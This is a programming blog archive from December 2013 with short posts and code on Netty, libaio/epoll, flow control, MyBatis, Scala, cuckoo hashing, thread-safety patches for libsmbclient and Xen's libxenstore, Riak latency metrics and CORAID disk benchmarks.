Monday, December 30, 2013
Let's do our own full blown HTTP server with Netty 4
Sometimes servlets just don't fit, sometimes you need to support protocols other than HTTP, and sometimes you need something really fast. Allow me to show you how Netty can suit these needs.
Netty is an asynchronous event-driven network application framework for rapid development of maintainable high performance protocol servers & clients. (http://netty.io/)

Netty has everything one needs for HTTP, so a web server on Netty is low-hanging fruit.
First of all you need to understand what a pipeline is; see the ChannelPipeline interface. A pipeline is like a processing line where various ChannelHandlers convert input bytes into output. A pipeline corresponds one-to-one to a connection, so in our case the ChannelHandlers will convert an HTTP request into an HTTP response: handlers are responsible for auxiliary things like parsing incoming packets and assembling outgoing ones, and they also call the business logic that handles requests and produces responses.
Full source is available.
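To make the pipeline idea concrete, here is a toy sketch — deliberately not the Netty API, just the shape of it: a connection's handlers form a chain of transformations on the way from raw input to a response. The request line and handler stages here are illustrative inventions.

```java
import java.util.ArrayList;
import java.util.List;
import java.util.function.Function;

public class PipelineDemo {
    public static void main(String[] args) {
        // A "pipeline" for one connection: each handler transforms its input.
        List<Function<String, String>> pipeline = new ArrayList<>();
        pipeline.add(raw -> raw.split(" ")[1]);                  // "parse": extract the path from the request line
        pipeline.add(path -> "Hello from " + path);              // "business logic": build the response body
        pipeline.add(body -> "HTTP/1.1 200 OK\r\n\r\n" + body);  // "assemble": wrap the body into a response

        String in = "GET /hello HTTP/1.1";
        for (Function<String, String> handler : pipeline)
            in = handler.apply(in);
        System.out.println(in); // the assembled response, body "Hello from /hello"
    }
}
```

In real Netty 4 the analogue is the ChannelPipeline: in a ChannelInitializer you add codec handlers (HTTP decoding/encoding) followed by your business-logic handler, and handlers see both inbound and outbound events.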
Sunday, December 29, 2013
Python, scalable file uploading
Almost every solution suffers either from dedicating a thread to a particular client (like django) or, despite having an event loop on board, from sucking the whole file into memory (like tornado). That makes it impossible to handle either a big number of clients or big files. We also do not want to delegate file upload completely to some external entity, because we want to make some auth checks before an upload is permitted (otherwise the server can be flooded with unauthorized ingest traffic).
I've borrowed the idea below from Anatoly Mikhailov; see his post Nginx direct file upload without passing them through backend. Let's do this quickly.
Thursday, December 26, 2013
Maintainable python code
The benefit of dynamically typed languages is the ease of writing code, but the cost is the difficulty of understanding it.
Strongly typed languages such as Haskell and Scala make use of a comprehensive static type system and a compiler that does all the dirty job. At any given point in the code one knows for sure that this variable has this type, this function has that return type, etc. So basically one can understand what is going on. In Python, with its duck typing, one can pass to a function any object that adheres to some contract; this function can pass it further and further, add/remove some methods on the fly, etc. So looking at some piece of code full of variables and function applications, one can barely understand it and loses track of what is going on. A static analyzer can help to some degree; see for instance PySonar, a Deep Static Analyzer for Python:
Treatment of Python’s dynamism. Static analysis for Python is hard because it has many dynamic features. They help make programs concise and flexible, but they also make automated reasoning about Python programs hard. Fortunately, some of these features can be reasonably handled. For example, function or class redefinition can be handled by inferring the effective scope of the old and new definitions. For code that are really undecidable, PySonar uses a universal honest answer: “I don’t know.” Well, not quite so. It attempts to report all known possibilities. For example, if a function is “conditionally defined” (e.g., defined differently in two branches of an if-statement) and the condition is undecidable, then PySonar gives it a union type which contains all possible types it can possibly have. By doing that, PySonar reduces false negative rates.

Sidenote: Scala has duck typing via structural types, but their usage in general is not recommended because the implementation uses reflection, which is slow. But indeed Scala structural typing is type safe in contrast to Python; see Structural typing vs. Duck typing.
There is an example of a dynamically typed language that doesn't suffer from the code readability problem: Erlang. One always knows what comes in and what comes out (and as a result what happens in each line of code). It doesn't have a comprehensive type system, except records (aka structs in C). But it has Function Specifications and dialyzer. Unlike Python, when you call a function in Erlang you pass not some object with encapsulated state and exposed behavior, but just plain data; the input data format is defined in the function spec along with the return data format. One doesn't need to pass behavior, because it is encapsulated in some other lightweight process, whose pid you may pass within the data. Because of such an elegant/specific implementation of encapsulation and polymorphism, Erlang solves the readability problem.
So, while pysonar is promising, can one still do something easier and better? Unit tests? Good to have, but covering each function is too much. Docstrings? Too informal. After a while I hit the article Making Wrong Code Look Wrong. I ended up with a simple idea: name each variable/function in a way that everybody understands what type it has/returns (the same for function args).
A simple example. Given the following information aside:

    user — a variable of type model.User
    userid — a user id, of type int

it is easy to get the idea of what the line below does, independently of where in the code you see it:

    user = user_by_userid(userid)

If you present this information about variables/functions in some formal way, IDEs/static analyzers can also put warnings on variables that do not have such a spec and on expressions/statements that just look wrong (see again the article by Joel Spolsky), navigate to type definitions, show variable/function descriptions on hover, etc.
AIO with epoll event loop
In order to use libaio with an epoll event loop, use eventfd(2). With eventfd you create a descriptor, add it to epoll for monitoring, and hand it to libaio so that you are notified when it has events. An excerpt from the source is below:
    if ((afd = eventfd()) == -1)
        goto err_end;
    ...
    io_set_eventfd(&iocb, afd);
    ...
    ev.events = EPOLLIN | EPOLLET;
    ev.data.ptr = p;
    if (epoll_ctl(epollfd, EPOLL_CTL_ADD, afd, &ev) == -1) {
        log_syserr("epoll_ctl");
        goto err_end;
    }

Full source is available.
Pipelining and flow control
If you are about to create your own application-level protocol on top of TCP to load your backend to its limit, you should know how to design such a protocol. Two things that come to mind immediately are pipelining and flow control.
Pipelining is what you get out of the box when using a stream-based transport layer. Higher-level protocols need not throw it away; for instance, HTTP 1.1 supports pipelining. In brief, it eliminates latency and jitter between client and server.
To see what flow control is, take a look at Akka IO Write models. It gives the server the ability to say: don't push me, slow down. Indeed, TCP itself implements ack-based flow control.
How to use it? Imagine you have a queue of tasks on the server side that is filled by clients and processed by the backend. If clients send tasks too quickly, the queue grows. One introduces a so-called high watermark and low watermark: when the queue length exceeds the high watermark, stop reading from the sockets, and the queue will drain; when it drops below the low watermark, start reading tasks from the sockets again.
Note, to make it possible for clients to adapt to the speed at which you process tasks (actually, to adapt their window size), one shouldn't make a big gap between the high and low watermarks. On the other hand, a small gap means you'll be adding/removing sockets to/from the event loop too often.
An excerpt from a real project that uses libev is below.
//------------------------------------------------------------------
static request_s *request_new(connection_s *con)
{
    request_s *new_request;

    new_request = alloc_data(request_mem_mng);
    if (!new_request) {
        log_err("cannot allocate memory");
        goto err;
    }
    memset(new_request, 0, sizeof(request_s));
    // Add to connection's list of requests
    list_add_tail(&new_request->request_list, &con->request_list);
    new_request->con = con;

    { // Flow control
        num_reqs++;
        if (num_reqs == REQUEST_HIGH_WATERMARK) {
            list_s *elt;
            connection_s *con;
            for (elt = connection_list.next; elt != &connection_list; elt = elt->next) {
                con = list_elt(elt, connection_s, connection_list);
                ev_io_stop(e_loop, &con->read_watcher);
            }
        }
    }
    return new_request;
err:
    return NULL;
}

//------------------------------------------------------------------
static void request_del(request_s *req)
{
    list_del(&req->request_list);
    list_del(&req->request_wait);
    if (req->data)
        free_data(data_mem_mng, req->data);
    free_data(request_mem_mng, req);

    { // Flow control
        num_reqs--;
        if (num_reqs == REQUEST_LOW_WATERMARK) {
            list_s *elt;
            connection_s *con;
            for (elt = connection_list.next; elt != &connection_list; elt = elt->next) {
                con = list_elt(elt, connection_s, connection_list);
                ev_io_start(e_loop, &con->read_watcher);
            }
        }
    }
}

Full source is available.
Why Scala
Pros
- Scala runs on the JVM - the most mature and trusted VM, which is fast, really fast; on Linux one can make use of mmapped files, epoll, AsynchronousChannel and other stuff. Take a look at the Resin web server, it is fast as hell (by hell I mean nginx; Resin has a bigger memory footprint but can process requests just as fast, though a part of Resin is written in C).
- Scala can reuse any Java library (and there are many) and run in various Java containers, such as any Servlet/Web Profile container like Resin/Tomcat/Glassfish, or even an OSGi one.
- Scala absorbed almost every good thing from the programming languages of the past 40+ years (Lisp - 1958, ML - 1973, Haskell - 1990, Java - 1995). For those who loved typeclasses in Haskell, Scala has implicits, which are effectively the same beast. And unlike academic languages such as Lisp and Haskell, Scala has a good practical focus.
- Scala has the mature and proven Akka framework, a copy of Erlang OTP - the best thing for highly available and scalable applications. See Case Studies. You will love supervision trees, distribution of actors among nodes that is transparent from the application's perspective, declarative executor configuration, the IO model, etc. Akka IPC is based on Netty, one of the best Java IO frameworks, which even implements its own buffer pool so as not to suffer from GC. Akka also has its own cluster implementation with the Gossip protocol on board.
- Scala has its own web frameworks like Play and Spray, both on top of Akka.
Cons
- Scala is a bit complex. Ideally one needs experience in Java (you'll be using the JVM and Java libs anyway), Haskell (to understand the functional stuff), and Erlang OTP (to properly use actors and reactive programming).
- You can write an application in Java and start rewriting some parts in Scala, which makes a smooth transition possible.
Wednesday, December 25, 2013
Good Transfer Object Hierarchy
One approach has worked well for me. Allow me to show it by example.
class UserTO {
    private Long id;
    ...
    public Long getId() { return id; }
    public void setId(Long id) { this.id = id; }
    ...
}

class UserHistoryTO {
    private Long id;
    ...
    public Long getId() { return id; }
    public void setId(Long id) { this.id = id; }
    ...
}

class UserDetailsTO extends UserTO {
    private List<UserHistoryTO> userHistory;
    ...
    public List<UserHistoryTO> getUserHistory() { return userHistory; }
    public void setUserHistory(List<UserHistoryTO> userHistory) { this.userHistory = userHistory; }
    ...
}

Do you see the point? Ok, whatever.
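In case the point is not obvious, a hedged sketch below (class bodies trimmed; the `describe` helper is a hypothetical name, not from the post) shows the payoff: list views can return the light UserTO, a detail view returns UserDetailsTO with the aggregated history, and code that needs only the common fields accepts the base type and works with both.

```java
import java.util.ArrayList;
import java.util.List;

public class TODemo {
    static class UserTO {
        private Long id;
        public Long getId() { return id; }
        public void setId(Long id) { this.id = id; }
    }
    static class UserHistoryTO { }
    static class UserDetailsTO extends UserTO {
        private List<UserHistoryTO> userHistory = new ArrayList<>();
        public List<UserHistoryTO> getUserHistory() { return userHistory; }
    }

    // Accepts the base type, so it works for both the light and the detailed object.
    static String describe(UserTO user) { return "user#" + user.getId(); }

    public static void main(String[] args) {
        UserDetailsTO details = new UserDetailsTO();
        details.setId(42L);
        System.out.println(describe(details)); // user#42
    }
}
```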
I'll go with MyBatis
You've worked hard and developed a bunch of persistence-capable entities, data objects to hold projections, a good amount of JPQL/HQL NamedQueries, a few native SQL queries; optimistic locking is still perfect; you've put in OpenEntityManagerInViewFilter because some lazy things do not adhere to transaction demarcation and boundaries, and it works, it works just fine. Then you push it to production, wait a month or so, open The Slow Query Log, and... !#@!, you think.
I'd advise against JPA/Hibernate, especially when you do something highly scalable and highly available (see Sean Hull's 20 Biggest Bottlenecks That Reduce And Slow Down Scalability, Rule Number 9), and especially when CQRS and Event Sourcing are a big deal. Ok, one may believe that programming against a relational database without knowing how to write SQL, or what execution plan will be used to run it, is a good idea as long as you protect yourself with Hibernate. But although Hibernate abstracts the relational database away, it doesn't remove the complexity; take a look at the Hibernate ORM documentation. And after all, abstractions are leaky and you'll end up debugging SQL and writing native queries.
But you probably do not want to program in JDBC anymore. To make it convenient to work with the DB and let the DB do its stuff, I'd use MyBatis, which just removes boilerplate code and doesn't introduce any magic. And yes, it is simple; see the MyBatis3 Introduction.
To give you a feel for what it is like, here is a really minimalistic example. Mapper xml file src/main/resources/test/persistence/TestMapper.xml:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE mapper PUBLIC "-//mybatis.org//DTD Mapper 3.0//EN"
    "http://mybatis.org/dtd/mybatis-3-mapper.dtd">
<mapper namespace="test.persistence.TestMapper">
    <select id="selectOne" parameterType="long" resultType="test">
        SELECT t.id, t.name FROM test t WHERE t.id = #{id}
    </select>
</mapper>

Mapper interface src/main/java/test/persistence/TestMapper.java:

package test.persistence;

import test.model.Test;

public interface TestMapper {
    Test selectOne(Long id);
}

Transfer object src/main/java/test/model/Test.java:

package test.model;

import java.io.Serializable;

public class Test implements Serializable {
    private Long id;
    private String name;

    public Test() {
        super();
    }

    public Long getId() { return id; }
    public void setId(Long id) { this.id = id; }
    public String getName() { return name; }
    public void setName(String name) { this.name = name; }
}

And a piece of code that makes use of it:

try (SqlSession session = sqlSessionFactory.openSession(TransactionIsolationLevel.REPEATABLE_READ)) {
    TestMapper mapper = session.getMapper(TestMapper.class);
    Test res = mapper.selectOne(1L);
    session.commit();
}

So as you may guess, the mapper interface is implemented by MyBatis with the help of the provided mapper xml file. See MyBatis3 Getting started.
Tuesday, December 24, 2013
Java, ConcurrentSkipListMap
Why is there no ConcurrentTreeMap in Java? Because balanced trees parallelize badly (rebalancing touches many nodes at once), while it is easy to implement a lock-free skip list with the same O(log n) cost.
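A minimal usage sketch (standard library only): ConcurrentSkipListMap gives you the sorted-map operations a ConcurrentTreeMap would have offered, safely under concurrent access and without external locking.

```java
import java.util.concurrent.ConcurrentSkipListMap;

public class SkipListDemo {
    public static void main(String[] args) {
        ConcurrentSkipListMap<Integer, String> map = new ConcurrentSkipListMap<>();
        // Insertion order does not matter: keys are kept sorted.
        map.put(30, "c");
        map.put(10, "a");
        map.put(20, "b");

        System.out.println(map.firstKey());     // 10
        System.out.println(map.ceilingKey(15)); // smallest key >= 15, i.e. 20
        System.out.println(map.headMap(30));    // {10=a, 20=b}
    }
}
```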
If you have no memory but still want hash table
An ordinary hash table has a practical limit on load factor below 75%. If you want more, consider Cuckoo hashing: using just three hash functions increases the achievable load to 91%.
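A hedged sketch of the idea: a toy cuckoo hash set with three hash functions (the variant the 91% figure refers to) and capped relocation. The mixing constants, the round-robin eviction policy, and the grow-on-failure fallback are illustrative choices, not a canonical implementation.

```java
// Toy cuckoo hash set over non-zero long keys (0 marks an empty slot).
class CuckooHash {
    private long[] table;
    private static final int MAX_KICKS = 32; // relocation cap before growing

    CuckooHash(int capacity) { table = new long[capacity]; }

    // i-th hash function (i in 0..2); constants are arbitrary odd mixers.
    private int hash(long key, int i) {
        long h = key * 0x9E3779B97F4A7C15L + i * 0xC2B2AE3D27D4EB4FL;
        h ^= h >>> 31;
        return (int) Math.floorMod(h, (long) table.length);
    }

    boolean contains(long key) {
        for (int i = 0; i < 3; i++)
            if (table[hash(key, i)] == key) return true;
        return false;
    }

    void insert(long key) {
        if (contains(key)) return;
        long cur = key;
        for (int kick = 0; kick < MAX_KICKS; kick++) {
            // Try the three candidate slots; take the first free one.
            for (int i = 0; i < 3; i++) {
                int idx = hash(cur, i);
                if (table[idx] == 0) { table[idx] = cur; return; }
            }
            // All occupied: evict the occupant of one candidate slot and retry with it.
            int idx = hash(cur, kick % 3);
            long evicted = table[idx];
            table[idx] = cur;
            cur = evicted;
        }
        rehash(cur); // too many kicks: grow the table and reinsert everything
    }

    private void rehash(long pending) {
        long[] old = table;
        table = new long[old.length * 2];
        for (long k : old) if (k != 0) insert(k);
        insert(pending);
    }
}
```

Each key lives in one of only three possible slots, so lookups probe at most three cells; the displacement loop is what lets the table stay dense.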
libsmbclient3 and multithreading
If you want to use libsmbclient3 in a process with many threads, you are out of luck.
The first problem is that talloc_stack.c in libsmbclient is not thread safe. It is easy to fix:
diff --git a/lib/util/talloc_stack.c b/lib/util/talloc_stack.c
index 8e559cc..b88962b 100644
--- a/lib/util/talloc_stack.c
+++ b/lib/util/talloc_stack.c
@@ -39,6 +39,11 @@
 #include "includes.h"
+
+#include <pthread.h>
+static pthread_mutex_t mutex_lock = PTHREAD_MUTEX_INITIALIZER;
+
+
 struct talloc_stackframe {
 	int talloc_stacksize;
 	int talloc_stack_arraysize;
@@ -82,7 +87,12 @@ static struct talloc_stackframe *talloc_stackframe_create(void)
 		smb_panic("talloc_stackframe_init malloc failed");
 	}
-	SMB_THREAD_ONCE(&ts_initialized, talloc_stackframe_init, NULL);
+	SMB_THREAD_LOCK(&mutex_lock);
+	if (!ts_initialized)
+		talloc_stackframe_init(NULL);
+	ts_initialized = true;
+	SMB_THREAD_UNLOCK(&mutex_lock);
+	//SMB_THREAD_ONCE(&ts_initialized, talloc_stackframe_init, NULL);
 	if (SMB_THREAD_SET_TLS(global_ts, ts)) {
 		smb_panic("talloc_stackframe_init set_tls failed");
@@ -118,6 +128,7 @@ static int talloc_pop(TALLOC_CTX *frame)
 static TALLOC_CTX *talloc_stackframe_internal(size_t poolsize)
 {
 	TALLOC_CTX **tmp, *top, *parent;
+	if (global_ts == NULL) talloc_stackframe_init(NULL);
 	struct talloc_stackframe *ts = (struct talloc_stackframe *)SMB_THREAD_GET_TLS(global_ts);

The second problem: set_global_myname() and set_global_myworkgroup() in source3/lib/util_names.c are not thread safe either.
diff --git a/source3/lib/util_names.c b/source3/lib/util_names.c
index bd6e5c1..1d8a96e 100644
--- a/source3/lib/util_names.c
+++ b/source3/lib/util_names.c
@@ -27,17 +27,24 @@
 static char *smb_myname;
 static char *smb_myworkgroup;
+#include <pthread.h>
+static pthread_mutex_t mutex_lock = PTHREAD_MUTEX_INITIALIZER;
+
 /***********************************************************************
  Allocate and set myname. Ensure upper case.
 ***********************************************************************/
 bool set_global_myname(const char *myname)
 {
+	SMB_THREAD_LOCK(&mutex_lock);
 	SAFE_FREE(smb_myname);
 	smb_myname = SMB_STRDUP(myname);
-	if (!smb_myname)
+	if (!smb_myname) {
+		SMB_THREAD_UNLOCK(&mutex_lock);
 		return False;
+	}
 	strupper_m(smb_myname);
+	SMB_THREAD_UNLOCK(&mutex_lock);
 	return True;
 }
@@ -52,11 +59,15 @@ const char *global_myname(void)
 bool set_global_myworkgroup(const char *myworkgroup)
 {
+	SMB_THREAD_LOCK(&mutex_lock);
 	SAFE_FREE(smb_myworkgroup);
 	smb_myworkgroup = SMB_STRDUP(myworkgroup);
-	if (!smb_myworkgroup)
+	if (!smb_myworkgroup) {
+		SMB_THREAD_UNLOCK(&mutex_lock);
 		return False;
+	}
 	strupper_m(smb_myworkgroup);
+	SMB_THREAD_UNLOCK(&mutex_lock);
 	return True;
 }

What do you still need to know about libsmbclient3 and multithreading? Each context (SMBCCTX) must be used by only one thread at a time. All resources (open files and directories) are bound to a specific context and cannot be used from another one.
libxenstore bug
Open source is perfect until you hit a critical bug. Then you are doomed. Ok, just joking. There is a community; in other words, there are a lot of doomed people like you, and bugs like this one.
An example. There was (and probably is) a bug in Xen qemu-dm: it can just hang forever under some circumstances. "Some" is the key word here. I first saw this in Xen Opensource 3.4.2. Taking into account that qemu-dm is responsible for all the IO of a VM, that VM hangs too.
The problem was in libxenstore, which called pthread_cond_wait():
#define condvar_wait(c,m,hnd)	pthread_cond_wait(c,m)

	mutex_lock(&h->watch_mutex);

	/* Wait on the condition variable for a watch to fire. */
	while (list_empty(&h->watch_list))
		condvar_wait(&h->watch_condvar, &h->watch_mutex, h);
	msg = list_top(&h->watch_list, struct xs_stored_msg, list);
	list_del(&msg->list);

	/* Clear the pipe token if there are no more pending watches. */
	if (list_empty(&h->watch_list) && (h->watch_pipe[0] != -1))
		while (read(h->watch_pipe[0], &c, 1) != 1)
			continue;

watch_pipe is used for notifications (for select()) about events in watch_list. A separate thread writes to this pipe while adding an element to the list in read_message():
#define condvar_signal(c)	pthread_cond_signal(c)

	mutex_lock(&h->watch_mutex);

	/* Kick users out of their select() loop. */
	if (list_empty(&h->watch_list) && (h->watch_pipe[1] != -1))
		while (write(h->watch_pipe[1], body, 1) != 1)
			continue;

	list_add_tail(&msg->list, &h->watch_list);
	condvar_signal(&h->watch_condvar);

	mutex_unlock(&h->watch_mutex);

It looks ok, but it is not. Sometimes select() reports read readiness on watch_pipe[0] while watch_list is empty, and then pthread_cond_wait() hangs indefinitely. Relying on this is a big mistake: first, the kernel can give you false positives; second, even if the pipe contains something to read, another thread can modify the list before you actually take an element from it.
Having said that, the patch is obvious:
diff --git a/xen-3.4.2/tools/ioemu-qemu-xen/xenstore.c b/xen-3.4.2/tools/ioemu-qemu-xen/xenstore.c
index 11b305d..894e9a5 100644
--- a/xen-3.4.2/tools/ioemu-qemu-xen/xenstore.c
+++ b/xen-3.4.2/tools/ioemu-qemu-xen/xenstore.c
@@ -953,7 +953,7 @@ void xenstore_process_event(void *opaque)
     char **vec, *offset, *bpath = NULL, *buf = NULL, *drv = NULL, *image = NULL;
     unsigned int len, num, hd_index;
-    vec = xs_read_watch(xsh, &num);
+    vec = xs_read_watch_noblock(xsh, &num);
     if (!vec)
         return;
diff --git a/xen-3.4.2/tools/xenstore/xs.c b/xen-3.4.2/tools/xenstore/xs.c
index 9707d19..9ce5be6 100644
--- a/xen-3.4.2/tools/xenstore/xs.c
+++ b/xen-3.4.2/tools/xenstore/xs.c
@@ -611,11 +611,11 @@ bool xs_watch(struct xs_handle *h, const char *path, const char *token)
 			ARRAY_SIZE(iov), NULL));
 }
-/* Find out what node change was on (will block if nothing pending).
+/* Find out what node change was on.
  * Returns array of two pointers: path and token, or NULL.
  * Call free() after use.
  */
-char **xs_read_watch(struct xs_handle *h, unsigned int *num)
+static char **xs_read_watch_(struct xs_handle *h, unsigned int *num, bool block)
 {
 	struct xs_stored_msg *msg;
 	char **ret, *strings, c = 0;
@@ -623,9 +623,19 @@ char **xs_read_watch(struct xs_handle *h, unsigned int *num)
 	mutex_lock(&h->watch_mutex);
-	/* Wait on the condition variable for a watch to fire. */
-	while (list_empty(&h->watch_list))
-		condvar_wait(&h->watch_condvar, &h->watch_mutex, h);
+	if (block) {
+		/* Wait on the condition variable for a watch to fire. */
+		while (list_empty(&h->watch_list))
+			condvar_wait(&h->watch_condvar, &h->watch_mutex, h);
+	}
+	else if (list_empty(&h->watch_list)) {
+		/* Clear the pipe token if there are no more pending watches. */
+		if (list_empty(&h->watch_list) && (h->watch_pipe[0] != -1))
+			while (read(h->watch_pipe[0], &c, 1) != 1)
+				continue;
+		mutex_unlock(&h->watch_mutex);
+		return NULL;
+	}
 	msg = list_top(&h->watch_list, struct xs_stored_msg, list);
 	list_del(&msg->list);
@@ -662,6 +672,15 @@ char **xs_read_watch(struct xs_handle *h, unsigned int *num)
 	return ret;
 }
+char **xs_read_watch(struct xs_handle *h, unsigned int *num)
+{
+	return xs_read_watch_(h, num, true);
+}
+
+char **xs_read_watch_noblock(struct xs_handle *h, unsigned int *num)
+{
+	return xs_read_watch_(h, num, false);
+}
 /* Remove a watch on a node.
  * Returns false on failure (no watch on that node).
  */
diff --git a/xen-3.4.2/tools/xenstore/xs.h b/xen-3.4.2/tools/xenstore/xs.h
index bd36a0b..a921a40 100644
--- a/xen-3.4.2/tools/xenstore/xs.h
+++ b/xen-3.4.2/tools/xenstore/xs.h
@@ -109,6 +109,7 @@ int xs_fileno(struct xs_handle *h);
  * elements. Call free() after use. */
 char **xs_read_watch(struct xs_handle *h, unsigned int *num);
+char **xs_read_watch_noblock(struct xs_handle *h, unsigned int *num);
 /* Remove a watch on a node: implicitly acks any outstanding watch.
  * Returns false on failure (no watch on that node).
Get statistics from Riak
Riak uses folsom_metrics to gather stats. For instance, to obtain GET and PUT operation timings:
erl -name tst -remsh dev1@127.0.0.1 -setcookie riak

(dev1@127.0.0.1)1> folsom_metrics:get_histogram_statistics({riak_kv,node_get_fsm_time}).
[{min,4717},
 {max,8996},
 {arithmetic_mean,7383.6},
 {geometric_mean,7212.3111343349},
 {harmonic_mean,7027.752380931542},
 {median,7322},
 {variance,2550850.2666666666},
 {standard_deviation,1597.1381488984184},
 {skewness,-0.4278090078808716},
 {kurtosis,-1.5957932734122735},
 {percentile,[{75,8726},{95,8996},{99,8996},{999,8996}]},
 {histogram,[{7317,4},{10717,6},{12717,0}]}]
(dev1@127.0.0.1)2> folsom_metrics:get_histogram_statistics({riak_kv,node_put_fsm_time}).
[{min,6377},
 {max,15908},
 {arithmetic_mean,11016.857142857143},
 {geometric_mean,10642.075761157581},
 {harmonic_mean,10268.560398236386},
 {median,10245},
 {variance,8786965.516483517},
 {standard_deviation,2964.281618956525},
 {skewness,0.1986125638310398},
 {kurtosis,-1.3191900349579302},
 {percentile,[{75,14016},{95,14995},{99,15908},{999,15908}]},
 {histogram,[{11377,9},{15377,4},{19377,1}]}]

Note:
- all values are in microseconds;
- stats are stored for last minute only;
- data is stored in memory (in ets tables), so there is minimal impact on performance.
To also measure the backend (vnode) GET/PUT speed, one can patch riak_kv:

diff --git a/src/riak_kv_stat.erl b/src/riak_kv_stat.erl
index 6cd5240..cf06de8 100644
--- a/src/riak_kv_stat.erl
+++ b/src/riak_kv_stat.erl
@@ -250,6 +250,8 @@ update1({get_fsm, Bucket, Microsecs, undefined, undefined, PerBucket}) ->
     folsom_metrics:notify_existing_metric({?APP, node_gets}, 1, spiral),
     folsom_metrics:notify_existing_metric({?APP, node_get_fsm_time}, Microsecs, histogram),
     do_get_bucket(PerBucket, {Bucket, Microsecs, undefined, undefined});
+update1({get_vnode, Microsecs}) ->
+    folsom_metrics:notify_existing_metric({?APP, vnode_get_time}, Microsecs, histogram);
 update1({get_fsm, Bucket, Microsecs, NumSiblings, ObjSize, PerBucket}) ->
     folsom_metrics:notify_existing_metric({?APP, node_gets}, 1, spiral),
     folsom_metrics:notify_existing_metric({?APP, node_get_fsm_time}, Microsecs, histogram),
@@ -260,6 +262,8 @@ update1({put_fsm_time, Bucket, Microsecs, PerBucket}) ->
     folsom_metrics:notify_existing_metric({?APP, node_puts}, 1, spiral),
     folsom_metrics:notify_existing_metric({?APP, node_put_fsm_time}, Microsecs, histogram),
     do_put_bucket(PerBucket, {Bucket, Microsecs});
+update1({put_vnode, Microsecs}) ->
+    folsom_metrics:notify_existing_metric({?APP, vnode_put_time}, Microsecs, histogram);
 update1(read_repairs) ->
     folsom_metrics:notify_existing_metric({?APP, read_repairs}, 1, spiral);
 update1(coord_redir) ->
@@ -370,8 +374,10 @@ stats() ->
      {node_get_fsm_siblings, histogram},
      {node_get_fsm_objsize, histogram},
      {node_get_fsm_time, histogram},
+     {vnode_get_time, histogram},
      {node_puts, spiral},
      {node_put_fsm_time, histogram},
+     {vnode_put_time, histogram},
      {read_repairs, spiral},
      {coord_redirs_total, counter},
      {mapper_count, counter},
diff --git a/src/riak_kv_vnode.erl b/src/riak_kv_vnode.erl
index 0c1d761..8482548 100644
--- a/src/riak_kv_vnode.erl
+++ b/src/riak_kv_vnode.erl
@@ -760,8 +760,12 @@ perform_put({true, Obj},
                         reqid=ReqID,
                         index_specs=IndexSpecs}) ->
     Val = term_to_binary(Obj),
+    StartNow = now(),
     case Mod:put(Bucket, Key, IndexSpecs, Val, ModState) of
         {ok, UpdModState} ->
+            EndNow = now(),
+            Microsecs = timer:now_diff(EndNow, StartNow),
+            riak_kv_stat:update({put_vnode, Microsecs}),
             case RB of
                 true ->
                     Reply = {dw, Idx, Obj, ReqID};
@@ -866,7 +870,12 @@ do_get_term(BKey, Mod, ModState) ->
     end.
 do_get_binary({Bucket, Key}, Mod, ModState) ->
-    Mod:get(Bucket, Key, ModState).
+    StartNow = now(),
+    Res = Mod:get(Bucket, Key, ModState),
+    EndNow = now(),
+    Microsecs = timer:now_diff(EndNow, StartNow),
+    riak_kv_stat:update({get_vnode, Microsecs}),
+    Res.
 %% @private
 %% @doc This is a generic function for operations that involve

And now:
(dev1@127.0.0.1)1> folsom_metrics:get_histogram_statistics({riak_kv,vnode_get_time}).
[{min,1516},
 {max,5511},
 {arithmetic_mean,3751.9},
 {geometric_mean,3486.0111678580415},
 {harmonic_mean,3190.229915515953},
 {median,3892},
 {variance,1879300.7666666668},
 {standard_deviation,1370.8759122060126},
 {skewness,-0.2710851221084366},
 {kurtosis,-1.6493136210655186},
 {percentile,[{75,4760},{95,5511},{99,5511},{999,5511}]},
 {histogram,[{3816,4},{6516,6},{8516,0}]}]
(dev1@127.0.0.1)2> folsom_metrics:get_histogram_statistics({riak_kv,vnode_put_time}).
[{min,507},
 {max,1776},
 {arithmetic_mean,952.6428571428571},
 {geometric_mean,818.2293396377823},
 {harmonic_mean,722.2652885738648},
 {median,561},
 {variance,317468.09340659337},
 {standard_deviation,563.4430702445397},
 {skewness,0.5582974538827159},
 {kurtosis,-1.7588827239013622},
 {percentile,[{75,1615},{95,1759},{99,1776},{999,1776}]},
 {histogram,[{1407,9},{2207,5},{3007,0}]}]

Also note that with n_val=3, 1 PUT for Riak equals (1 GET + 1 PUT) * 3 nodes for leveldb/bitcask, and 1 GET for Riak equals 1 GET * 3 nodes for leveldb/bitcask.
CORAID speed test
Hardware: 2x10Gb link, 36x2TB drives on CORAID SRX 4200.
aoe-stat
e0.X 2000.398GB eth2,eth3 8704 up (36 drives total)
ethtool eth2
Speed: 10000Mb/s
ethtool eth3
Speed: 10000Mb/s
cec -s 0 eth2
disks
0.0 2000.398GB X.0.0 WDC WD2003FYYS-02W0B0 01.01D01 sata 3.0Gb/s (36 drives total)
list -l
X 2000.399GB online
X.0 2000.399GB jbod normal
X.0.0 normal 2000.399GB 0.X (36 JBODs total)
CORAID raw device speed (using aio, O_DIRECT to omit the cache, O_SYNC and different RAID types):
- JBODs, 36 LUNs per 2TB, 4 simultaneous request/LUN, read and write by 4K blocks
reads = 163.39 iops/LUN, 2m49.834s/1000000 blocks
writes = 455.37 iops/LUN, 1m0.602s/1000000 blocks
- raid6rs, 4 LUNs per 14TB, 100 simultaneous request/LUN, read and write by 4K blocks
reads = 1524.39 iops/LUN, 2m43.648s/1000000 blocks
writes = 164.47 iops/LUN, 2m31.699s/100000 blocks
- raid5, 4 LUNs per 16TB, 100 simultaneous request/LUN, read and write by 4K blocks
reads = 1519.94 iops/LUN, 2m44.482s/1000000 blocks
writes = 555.55 iops/LUN, 0m44.665s/100000 blocks
See the test program. You need libaio for it (POSIX aio in librt uses pthreads which is not appropriate because of massive parallelism in our tests).
Xenstore for fun and profit
The XenStore is the configuration database in which Xen stores information on the running domUs. Although Xen uses the XenStore internally for vital matters like setting up virtual devices, you can also write arbitrary data to it from domUs as well as from dom0. Think of it as some sort of interdomain socket.
I've stolen a useful script from The Book of Xen
#!/bin/sh
function dumpkey() {
    local param=${1}
    local key
    local result
    result=$(xenstore-list ${param})
    if [ "${result}" != "" ] ; then
        for key in ${result} ; do dumpkey ${param}/${key} ; done
    else
        echo -n ${param}'='
        xenstore-read ${param}
    fi
}
for key in /vm /local/domain /tool ; do dumpkey ${key} ; done
Let's do this
